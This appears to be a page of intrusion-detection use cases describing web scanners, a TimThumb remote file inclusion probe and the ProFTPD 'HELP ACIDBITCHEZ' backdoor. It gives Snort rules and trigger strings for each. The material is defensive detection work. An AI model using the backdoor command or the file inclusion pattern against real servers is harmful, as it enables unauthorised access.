SUC029 : WordPress TimThumb RFI Web Scanner/Robot

  • Use Case Reference : SUC029
  • Use Case Title : WordPress TimThumb RFI Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : ByroeNet scanners variant
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

Source(s) :

ZATAZ SIG 1010050 triggers are :

  • URI should contain “wp-content” and “php?src=http
  • The source port could be any FROM EXTERNAL_NET in destination of an HTTP_SERVERS HTTP_PORTS.
  • Threshold is configured to count 1 occurrence in 30 seconds for the same IP source.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ZATAZ Timthumb.php - ACCESS - posssible WordPress-Attack"; flow:established,to_server; uricontent:"wp-content"; nocase; uricontent:"php?src=http"; nocase; threshold:type limit, count 1, seconds 30, track by_src; classtype:web-application-attack; sid:1010050; priority:3; rev:1;)
SIG 1010050 1 Week events activity
SIG 1010050 1 Week events activity
SIG 1010050 1 month events activity
SIG 1010050 1 month events activity
SIG 1010050 1 year events activity
SIG 1010050 1 year events activity
1 Month TOP 10 source IPs for SIG 1010050
1 Month TOP 10 source IPs for SIG 1010050

SUC028 : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)

  • Use Case Reference : SUC028
  • Use Case Title : ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHEZ)
  • Use Case Detection : IDS / FTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Metasploit, Nessus, scripts, etc.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 21/TCP

Possible(s) correlation(s) :

  • Pen-testing tools or home made scripts

Source(s) :

  • ProFTPD Backdoor demo

Emerging Threats SIG 2011994 triggers are :

  • The FTP content should contain “HELP ACIDBITCHEZ“, how is the backdoor command.
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET port 21/TCP.
SIG 2011994 1 year events activity
SIG 2011994 1 year events activity

SUC027 : Muieblackcat setup.php Web Scanner/Robot

  • Use Case Reference : SUC027
  • Use Case Title : Muieblackcat setup.php Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : N.D.
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • Regarding the logs, this scanner is looking for “setup.php” files.

Source(s) :

Emerging Threats SIG 2013115 triggers are :

  • The HTTP header should contain “GET /muieblackcat HTTP/1.1“. A complete set of logs is available here.
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
SIG 2013115 1 Week events activity
SIG 2013115 1 Week events activity
SIG 2013115 1 month events activity
SIG 2013115 1 month events activity
1 Month TOP 10 source IPs for SIG 2013115
1 Month TOP 10 source IPs for SIG 2013115
TOP 20 source countries for SIG 2013115
TOP 20 source countries for SIG 2013115

SUC026 : DataCha0s Web Scanner/Robot

  • Use Case Reference : SUC026
  • Use Case Title : DataCha0s Web Scanner/Robot
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Source IP(s) : Random
  • Source Countries : Most of US and Brasil
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible(s) correlation(s) :

  • DataCha0s bot.

Source(s) :

Emerging Threats SIG 2003616 triggers are :

  • The HTTP header should contain “DataCha0s” User Agent string. Example : User-Agent: DataCha0s/2.0
  • The source port could be any FROM EXTERNAL_NET in destination of an HOME_NET HTTP_PORTS.
SIG 2003616 1 Week events activity
SIG 2003616 1 Week events activity
SIG 2003616 1 month events activity
SIG 2003616 1 month events activity
1 Month TOP 10 source IPs for SIG 2003616
1 Month TOP 10 source IPs for SIG 2003616
TOP 20 source countries for SIG 2003616
TOP 20 source countries for SIG 2003616